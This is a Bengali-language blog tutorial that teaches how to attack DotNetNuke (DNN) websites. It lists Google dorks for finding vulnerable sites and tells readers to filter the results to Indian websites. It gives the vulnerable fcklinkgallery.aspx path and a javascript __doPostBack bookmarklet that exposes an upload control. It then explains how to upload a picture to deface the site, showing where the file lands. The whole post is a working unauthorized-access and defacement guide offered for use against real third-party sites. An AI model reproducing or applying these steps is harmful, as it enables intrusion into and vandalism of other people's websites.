Breaking News

Wednesday, October 22, 2014

DNN এটাক কিভাবে করবেন? হ্যাকিং সম্পর্কিয় বিস্তারিত আলোচনা।

DNN মুলত বিভিন্ন সাইট এর ছোট
একটি বাগ । এটি ব্যাবহার করে ভুলনেরাবল সাইট এ আপনার পিকচার আপলোড দিতে
পারবেন । এই ছোট বাগ এর সুযোগ নিয়ে হ্যাকার রা সেই পুরো ওয়েবসাইট টাই
খেয়ে ফেলে । আমি আজকে আপনাদের সেই পদ্ধতি শেখাবো ।
প্রথমে আপনাদের যা করতে হবে তা হল
Google Dork ইউস করে আগে ভুলনেরাবল সাইট বের করতে হবে । নিচে দেখুন
Dork গুলো
 
0.  allinurl: ”/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
1. inurl:tabid/176/Default.aspx
2. inurl:”/portals/0/” site:.com
3.
inurl:/tabid/36/language/en-US/Default.aspx

4. inurl:/portals/0/default.aspx
5. inurl:DNN(Link Gallery)
প্রথম টাই সবচেয়ে উত্তম ।
Google.com এ গিয়ে উপরের যেকোন একটি ডরক দিয়ে সার্চ দিন ।
undefined
এবার আমাদের দরকার ইন্ডিয়া এর
ওয়েবসাইট । তাই পেজ এর একদম নিচে গিয়ে Advanced Search অপশন টি তে
ক্লিক করুন ।
এবার একটি এডভান্স অপশন পাবেন ।
সেখানে নিচের মত করে ডরক টি দিয়ে নিচে দেখুনDate, usage
rights, region, and more 
কিছু একটা আছে । সেখানে
ক্লিক করুন।এবার Where your keywords show up:এখানে
in the URL of the page সিলেক্ট করুন ।
এবং Region:  India সিলেক্ট করুন ।
এবার এডভান্স সার্চ দিন ।
undefined
এবার যে রেসাল্ট গুলো আসবে সেগুলো
ইন্ডিয়ান ওয়েবসাইট । এবার একটি লিংক এ ক্লিক করুন ।
যেমন ধরুন আমি করলাম http://demo4x.com
এবার নিচের মত করে লিংক এর পড়ে এই
লিংক টি বসিয়ে দিন -

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
তাহলে
লিংক টি এমন হবে -
http://demo4x.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
এখানে
নিচের মত একটি পেজ পাবেন ।
undefined
এখানে File
(A file on your site) এটিতে ক্লিক করুন ।
তাহলে
নিচের মত একটি পেজ পাবেন ।
সেখানে
খেয়াল করবেন File Location (root) সিলেক্ট করা আছে কিনা । অনেক সাইট
এ অন্য কিছু থাকে সেক্ষেত্রে একটু অন্য ভাবে কাজ করতে হবে । আমি সেটাও বলে
দিবো ।
এবার
আপনার ব্রাউজার এ নিচের জাভা স্ক্রপিট টি পেস্ট করে এন্টার চাপুন । অনেকের
ক্ষেত্রে জাভাস্ক্রিপ্ট এ সমস্যা হতে পারে । সময় বাচানোর জন্য বা সমস্যা
এরানোড় জন্য নিচের মত করে করে নিতে পারেন । এতে আপনার সুবিধা হবে এবং
জাভা স্ক্রিপ্ট দিতেও কোন সমস্যা হবে না ।
জাভাস্ক্রিপ্ট -
Javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
আপনার
ব্রাউজার এর Show Bookmark bar টি অন করতে হবে । এবার Add new
bookmark এ ক্লিক করুন । এবার নাম দিন
Javascript এবং লিংক এর জায়গায় নিচের
জাভাস্ক্রিপ্ট টি দিয়ে ওকে করুন । এবার যখন জাভাস্ক্রিপ্ট এর প্রয়োজন
হবে তখন এটাতে ক্লিক করলেই হবে ।
–==Chrome Javascript
Trick==–
–==Mozilla Javascript
Trick==–
জাভাস্ক্রিপ্ট -
Javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
জাভাস্ক্রিপ্ট দেয়া হলে নিচের মত
পেজ পাবেন ।

এবার
ব্রাউজ এ ক্লিক করে আপনার বানানো .png/.jpg/.gif/.swf ফাইল টি অর্থাৎ
আপনার বানানো ছবিটি বা এনিমেশন টি আপলোড করে দিন ।
এবার খেয়াল করুন । আপলোড হয়ে
গেলে আপনি আপনার ফাইল টি পাবেন কোথায় ? তখন আপনি আপনার ফাইল টি পাবেন
এখানে – yoursite.com/portals/0/yourfile.jpg
যেমন আমি পেয়েছি -http://demo4x.com/Portals/0/bangladesh.png



এবার দেখুন আমার আপলোড করা ফাইল টি দেখা
যাচ্ছে


আপনার যদি root এর জায়গায় অন্য
কিছু থাকে বা আপনার ফাইল টি না পান তবে কি করবেন ? তখন root এর
জায়গায় যা লিখা ছিল তা লিখে এর আগে আপনার সাইট এর ঠিকানা লিখে গুগল এ
সার্চ দিন । তাহলে আপনি সঠিক লিংক টি পেয়ে যাবেন । লিংক টি তে গেলে আপনার
আপলোড দেয়া ফাইল দেখতে পাবেন ।
© 2015 S.A.S. Computer | Designed By Sheik Mohammad Shamsad